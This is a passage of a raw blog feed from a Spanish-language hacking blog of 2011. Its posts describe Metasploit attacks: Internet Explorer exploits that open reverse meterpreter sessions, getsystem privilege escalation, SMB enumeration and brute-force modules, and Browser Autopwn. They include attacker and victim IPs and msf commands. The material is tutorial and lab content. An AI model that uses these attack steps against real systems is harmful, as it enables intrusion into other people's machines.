href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/rsx7cIS91j0/adobe-cooltype-sing-table-uniquename.html" title="Adobe CoolType SING Table &quot;uniqueName&quot; Stack Buffer Overflow" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/VKLbFhdbSwM/default.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/adobe-cooltype-sing-table-uniquename.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUUEQ3o-eCp7ImA9WhRSEkU.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-7266205901322885896</id><published>2011-11-14T09:05:00.002-06:00</published><updated>2011-11-14T09:06:42.450-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-14T09:06:42.450-06:00</app:edited><title>wallpaper</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/-sQxrkQMqvNY/TsEufTu1aWI/AAAAAAAAATg/jPg_KobK3ro/s1600/26.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://2.bp.blogspot.com/-sQxrkQMqvNY/TsEufTu1aWI/AAAAAAAAATg/jPg_KobK3ro/s320/26.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5674868120871070050" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-7266205901322885896?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/iRG8d-ZYcGl3omUsDmFXfQmAP1I/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/iRG8d-ZYcGl3omUsDmFXfQmAP1I/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/iRG8d-ZYcGl3omUsDmFXfQmAP1I/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/iRG8d-ZYcGl3omUsDmFXfQmAP1I/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/MQargoq5gCo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/7266205901322885896/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=7266205901322885896" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/7266205901322885896?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/7266205901322885896?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/MQargoq5gCo/wallpaper.html" title="wallpaper" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-sQxrkQMqvNY/TsEufTu1aWI/AAAAAAAAATg/jPg_KobK3ro/s72-c/26.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/wallpaper.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUQNSHg7fyp7ImA9WhRTGUk.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-4573394376863917861</id><published>2011-11-07T12:12:00.006-06:00</published><updated>2011-11-10T10:43:19.607-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-10T10:43:19.607-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Base de datos con Metasploit" /><category scheme="http://www.blogger.com/atom/ns#" term="hacking internet explorer" /><category scheme="http://www.blogger.com/atom/ns#" term="zerialkiller" /><category scheme="http://www.blogger.com/atom/ns#" term="msfconsole" /><category scheme="http://www.blogger.com/atom/ns#" term="empleos hacking" /><title>Internet Explorer Winhlp32.exe MsgBox Code Execution</title><content type="html">Este modulo explota una vulnerabilidad que permite ejecutar código arbitrario cuando el usuario presiona la tecla F1 en un MessageBox creado a través de un VBscript en una página Web. Cuando el usuario presiona la tecla F1 se despliega automáticamente el MessageBox de ayuda el cual cargará y usará el archivo HLP desde un servidor SMB o WebDAV. Esta versión en particular del exploit implementa un servidor WebDAV el cual enviara el archivo HLP y el PAYLOAD a la maquina atacada. &lt;br /&gt;&lt;br /&gt;Durante las pruebas se detectaron mensajes generados por el Payload los cuales pueden prevenir al usuario víctima del ataque, los desarrolladores de este exploit esperan obtener una versión del mismo que no genere estos mensajes de alerta. &lt;br /&gt;&lt;br /&gt;Target: &lt;br /&gt;0 - Automatic (default)&lt;br /&gt;1 - Internet Explorer on Windows &lt;br /&gt;&lt;br /&gt;Desarrollado por: &lt;br /&gt;Maurycy Prodeus &lt;br /&gt;jduck "jduck [at] metasploit.com" &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Se ejecuta el exploit y se espera por la victima:&lt;br /&gt;&lt;br /&gt;En la maquina atacada se obtiene un MessageBox alentando al usuario a presionar la tecla F1: &lt;br /&gt;&lt;br /&gt;Después de que el usuario da clic sobre el botón Aceptar y presiona la tecla F1 se obtiene una sesión meterpreter: &lt;br /&gt;&lt;br /&gt;Los mensajes de alerta que se muestran en la maquina víctima durante este proceso son: &lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.nyxbone.com/images/articulos/metasploit/ms10_022_ie_vbscript_winhlp32/v2.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 404px; height: 293px;" src="http://www.nyxbone.com/images/articulos/metasploit/ms10_022_ie_vbscript_winhlp32/v2.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Al dar clic en la opción “Ejecutar” se obtiene: &lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.nyxbone.com/images/articulos/metasploit/ms10_022_ie_vbscript_winhlp32/v3.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 396px; height: 126px;" src="http://www.nyxbone.com/images/articulos/metasploit/ms10_022_ie_vbscript_winhlp32/v3.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;La sesión de meterpreter obtenida tiene permisos de usuario limitados, por tal razón se usa la función GETSYSTEM la cual nos permite aumentar el nivel de privilegios en la maquina atacada para poder ejecutar comandos más avanzados. &lt;br /&gt;&lt;br /&gt;En este caso getsystem (el cual implementa las técnicas disponibles de manera automática) usa la técnica 1: Service – Named Pipe Impersonation (In Memory/Admin). &lt;br /&gt;&lt;br /&gt;POC.&lt;br /&gt;Video: &lt;a href="http://www.youtube.com/watch?v=DlepoeBBxbE"&gt;AQUI&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;http://www.youtube.com/watch?v=DlepoeBBxbE&lt;br /&gt;&lt;br /&gt;&lt;iframe width="425" height="349" src="http://www.youtube.com/embed/DlepoeBBxbE?hl=es&amp;fs=1" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-4573394376863917861?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/B56E1IdZz7sSsmn796e2d-gNCGw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/B56E1IdZz7sSsmn796e2d-gNCGw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/B56E1IdZz7sSsmn796e2d-gNCGw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/B56E1IdZz7sSsmn796e2d-gNCGw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/D0dc0t3aqDU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/4573394376863917861/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=4573394376863917861" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/4573394376863917861?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/4573394376863917861?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/D0dc0t3aqDU/internet-explorer-winhlp32exe-msgbox.html" title="Internet Explorer Winhlp32.exe MsgBox Code Execution" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/DlepoeBBxbE/default.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/internet-explorer-winhlp32exe-msgbox.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0IBRnw8fCp7ImA9WhRTFkU.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-3322906380404725603</id><published>2011-11-07T11:55:00.002-06:00</published><updated>2011-11-07T12:12:37.274-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-07T12:12:37.274-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="internet explorer" /><category scheme="http://www.blogger.com/atom/ns#" term="msfconsole" /><category scheme="http://www.blogger.com/atom/ns#" term="metasploit" /><title>Internet Explorer DHTML Behaviors Use After Free</title><content type="html">Este modulo explota una vulnerabilidad del tipo use-after-free que está incluida en el componente DHTML de Internet Explorer en las versiones 6 y 7. Este tipo de error es usado muy frecuentemente y se conoce como la vulnerabilidad “iepeers”. El nombre se da debido a la solución que planteo Microsoft de bloquear el acceso al archivo iepeers.dll. &lt;br /&gt;&lt;br /&gt;Targets: &lt;br /&gt;* 0 - (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista (default)&lt;br /&gt;* 1 - IE 6 SP0-SP2 (onclick)&lt;br /&gt;* 2 - IE 7.0 (marquee) &lt;br /&gt;&lt;br /&gt;Desarrollado por:&lt;br /&gt;* unknown &lt; &gt;&lt;br /&gt;* Trancer &lt; mtrancer [at] gmail.com &gt;&lt;br /&gt;* Nanika &lt; &gt;&lt;br /&gt;* jduck &lt; jduck [at] metasploit.com &gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Se definen las opciones disponibles por el exploit: &lt;br /&gt;&lt;br /&gt;1. Dirección IP atacante: 192.168.100.228&lt;br /&gt;2. Dirección IP víctima: 192.168.100.232&lt;br /&gt;3. URL: http://192.168.100.228:8080/hola.html&lt;br /&gt;4. Payload: Windows/meterpreter/reverce_tcp&lt;br /&gt;5. Puerto de conexión con la maquina atacante: 4444&lt;br /&gt;&lt;br /&gt;msf &gt; search DHTML&lt;br /&gt;&lt;br /&gt;Matching Modules&lt;br /&gt;================&lt;br /&gt;&lt;br /&gt;   Name                                           Disclosure Date  Rank  Description&lt;br /&gt;   ----                                           ---------------  ----  -----------&lt;br /&gt;   exploit/windows/browser/ms10_018_ie_behaviors  2010-03-09       good  Internet Explorer DHTML Behaviors Use After Free&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;msf &gt; &lt;br /&gt;&lt;br /&gt;---&gt; http://www.nyxbone.com/metasploit/ms10_018_ie_behaviors.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-3322906380404725603?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/vWOlO83Psn3yWfuBFN1rVz1ws6Q/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/vWOlO83Psn3yWfuBFN1rVz1ws6Q/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/vWOlO83Psn3yWfuBFN1rVz1ws6Q/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/vWOlO83Psn3yWfuBFN1rVz1ws6Q/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/_Lf9wvoKs7o" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/3322906380404725603/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=3322906380404725603" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/3322906380404725603?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/3322906380404725603?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/_Lf9wvoKs7o/internet-explorer-dhtml-behaviors-use.html" title="Internet Explorer DHTML Behaviors Use After Free" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/internet-explorer-dhtml-behaviors-use.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkMNQn87fSp7ImA9WhRTFkU.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-8688115307768875478</id><published>2011-11-07T11:49:00.001-06:00</published><updated>2011-11-07T11:54:53.105-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-07T11:54:53.105-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="ataque con armitage" /><category scheme="http://www.blogger.com/atom/ns#" term="Armitage" /><category scheme="http://www.blogger.com/atom/ns#" term="msfconsole" /><category scheme="http://www.blogger.com/atom/ns#" term="metasploit" /><category scheme="http://www.blogger.com/atom/ns#" term="BackTrack 5" /><category scheme="http://www.blogger.com/atom/ns#" term="empleos hacking" /><title>Illustrating the Process of a Network Attack with Armitage</title><content type="html">Comparto excelente video.&lt;br /&gt;&lt;br /&gt;&lt;iframe src="http://player.vimeo.com/video/31177473?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="225" frameborder="0" webkitAllowFullScreen allowFullScreen&gt;&lt;/iframe&gt;&lt;p&gt;&lt;a href="http://vimeo.com/31177473"&gt;Illustrating the Process of a Network Attack with Armitage&lt;/a&gt; from &lt;a href="http://vimeo.com/user4239643"&gt;Surapheal Belay&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-8688115307768875478?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/bxv1KhGelf5jm_J2jVd2ylXK-iU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/bxv1KhGelf5jm_J2jVd2ylXK-iU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/bxv1KhGelf5jm_J2jVd2ylXK-iU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/bxv1KhGelf5jm_J2jVd2ylXK-iU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/ITLNJu1EF48" height="1" width="1"/&gt;</content><link rel="related" href="http://vimeo.com/31177473" title="Illustrating the Process of a Network Attack with Armitage" /><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/8688115307768875478/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=8688115307768875478" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/8688115307768875478?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/8688115307768875478?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/ITLNJu1EF48/illustrating-process-of-network-attack.html" title="Illustrating the Process of a Network Attack with Armitage" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/illustrating-process-of-network-attack.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEEHRns4eyp7ImA9WhRTEUs.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-5527398755340735905</id><published>2011-11-01T09:01:00.008-06:00</published><updated>2011-11-01T09:50:37.533-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-01T09:50:37.533-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="hacking smb" /><category scheme="http://www.blogger.com/atom/ns#" term="msfconsole" /><category scheme="http://www.blogger.com/atom/ns#" term="metasploit" /><category scheme="http://www.blogger.com/atom/ns#" term="smb" /><title>SMB Scanners Metasploit</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.daw-labs.com/wp-content/uploads/2010/04/icbm2.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 260px; height: 318px;" src="http://www.daw-labs.com/wp-content/uploads/2010/04/icbm2.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Metasploit cuenta con varios modulos para la consultar y auditar la seguridad del protocolo SMB.&lt;br /&gt;&lt;br /&gt;Podemos hacer un msf &gt; search  y posteriormente el nombre de cada uno de ellos para mas informacion msf &gt; info &lt;br /&gt;&lt;br /&gt;» smb/pipe_auditor &lt;br /&gt;» smb/pipe_dcerpc_auditor &lt;br /&gt;» smb/smb2 &lt;br /&gt;» smb/smb_enumshares &lt;br /&gt;» smb/smb_enumusers &lt;br /&gt;» smb/smb_login &lt;br /&gt;» smb/smb_lookupsid &lt;br /&gt;» smb/smb_version&lt;br /&gt;&lt;br /&gt;PIPE AUDITOR &lt;br /&gt;&lt;br /&gt;El modulo pipe_auditor puede ser utilizado para determinar qué servicios están disponibles sobre SMB&lt;br /&gt;&lt;br /&gt;PIPE DCERPC AUDITOR &lt;br /&gt;&lt;br /&gt;Este escáner retornara los servicios DCERPC a los cuales se puede tener acceso a través de un canal SMB.&lt;br /&gt;&lt;br /&gt;SMB2 &lt;br /&gt;&lt;br /&gt;Permite determinar si los diferentes hosts de la red soportan el protocolo SMB2.&lt;br /&gt;&lt;br /&gt;SMB ENUM SHARES &lt;br /&gt;&lt;br /&gt;Este modulo permite consultar los diferentes archivos y carpetas compartidas en los sistemas de la red. Como se puede observar todos las consultas son bloqueadas en todos los sistemas, una ventaja de este modulo es que permite ingresar las credenciales de usuario / contraseña de manera que esta combinación pueda ser probada en todos los sistemas de la red.&lt;br /&gt;&lt;br /&gt;ENUM USERS &lt;br /&gt;&lt;br /&gt;El escáner smb_enumusers se conectara con cada sistema a través del servicio SMB RPC y listará todos los usuarios existentes.&lt;br /&gt;&lt;br /&gt;SMB LOGIN &lt;br /&gt;&lt;br /&gt;El modulo smb_login permite validar el acceso en todos los sistemas de la red a través del protocolo SMB, además maneja una cantidad de opciones mayor a la de otros módulos, entre ellas se tiene la opción de cargar archivos que contengan nombres de usuario y contraseñas, aumentar la velocidad del ataque de fuerza bruta entre otras.&lt;br /&gt;&lt;br /&gt;SMB LOOKUPSID &lt;br /&gt;&lt;br /&gt;El modulo smb_lookupsid permite determinar que usuarios ahí creados en cada una de las maquinas de la red, esta función es de gran utilidad a la hora de realizar futuros ataques de fuerza bruta.&lt;br /&gt;&lt;br /&gt;SMB VERSION &lt;br /&gt;&lt;br /&gt;Este modulo permite escanear un rango de direcciones IP en la red para determinar la versión del servicio SMB en cada máquina, así mismo permite visualizar el sistema operativo con el que cuenta cada una de los equipos a los cuales se puede tener acceso, el resultado con o sin credenciales de usuario / contraseña no varía de forma significativa en los resultados.&lt;br /&gt;&lt;br /&gt;Tenemos unos Cuantos MAS =) &lt;br /&gt;&lt;br /&gt;msf &gt; search smb/smb&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-X0e5PBxMrFU/TrAUNaShQFI/AAAAAAAAATU/PQRVuKg6_LM/s1600/smb.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 180px;" src="http://1.bp.blogspot.com/-X0e5PBxMrFU/TrAUNaShQFI/AAAAAAAAATU/PQRVuKg6_LM/s320/smb.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5670054151487307858" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-5527398755340735905?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/UaiY3NAqU5EM-376yb6A7imFDUg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/UaiY3NAqU5EM-376yb6A7imFDUg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/UaiY3NAqU5EM-376yb6A7imFDUg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/UaiY3NAqU5EM-376yb6A7imFDUg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/fJU25omtuNw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/5527398755340735905/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=5527398755340735905" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/5527398755340735905?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/5527398755340735905?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/fJU25omtuNw/smb-scanners-metasploit.html" title="SMB Scanners Metasploit" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-X0e5PBxMrFU/TrAUNaShQFI/AAAAAAAAATU/PQRVuKg6_LM/s72-c/smb.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2011/11/smb-scanners-metasploit.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CE8ARHkzcCp7ImA9WhRTEUs.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-8037304593198524606</id><published>2011-11-01T08:46:00.004-06:00</published><updated>2011-11-01T09:54:05.788-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-01T09:54:05.788-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="exploradores" /><category scheme="http://www.blogger.com/atom/ns#" term="msfconsole" /><category scheme="http://www.blogger.com/atom/ns#" term="metasploit" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerabilidades exploradores" /><category scheme="http://www.blogger.com/atom/ns#" term="hacking" /><title>Browser Autopwn</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_cAiMGiR1UH8/StuHi--31NI/AAAAAAAAAB4/iALxCQITBsk/s320/metasploit_hax_small.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 300px; height: 215px;" src="http://4.bp.blogspot.com/_cAiMGiR1UH8/StuHi--31NI/AAAAAAAAAB4/iALxCQITBsk/s320/metasploit_hax_small.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Metasploit ofrece la posibilidad de lanzar exploits de acuerdo al la versión del browser que la victima este utilizando, es decir que si el usuario usa Firefox como su explorador predeterminado no se tendrán en cuenta (al momento de ejecutar el ataque) exploits para Internet Explorer. &lt;br /&gt;&lt;br /&gt;Para usar esta característica se debe ejecutar el modulo: &lt;br /&gt;&lt;br /&gt;msf &gt; use server/browser_autopwn &lt;br /&gt;&lt;br /&gt;y cambiar las opciones requeridas como LHOST y URIPATH. &lt;br /&gt;&lt;br /&gt;Este ataque puede ser efectuado también para todos los tipos de exploradores existentes como son: &lt;br /&gt;&lt;br /&gt;Firefox&lt;br /&gt;Internet Explorer&lt;br /&gt;Opera&lt;br /&gt;Safari&lt;br /&gt;Chrome, etc.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-8037304593198524606?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/9IZMP4fVFluSDAXexiR4ftRHX0Q/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/9IZMP4fVFluSDAXexiR4ftRHX0Q/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/9IZMP4fVFluSDAXexiR4ftRHX0Q/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/9IZMP4fVFluSDAXexiR4ftRHX0Q/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/u6WSBt7FuE4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/8037304593198524606/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=8037304593198524606" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/8037304593198524606?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/8037304593198524606?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/u6WSBt7FuE4/browser-autopwn.html" title="Browser Autopwn" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_cAiMGiR1UH8/StuHi--31NI/AAAAAAAAAB4/iALxCQITBsk/s72-c/metasploit_hax_small.jpg" height="72" width="72" 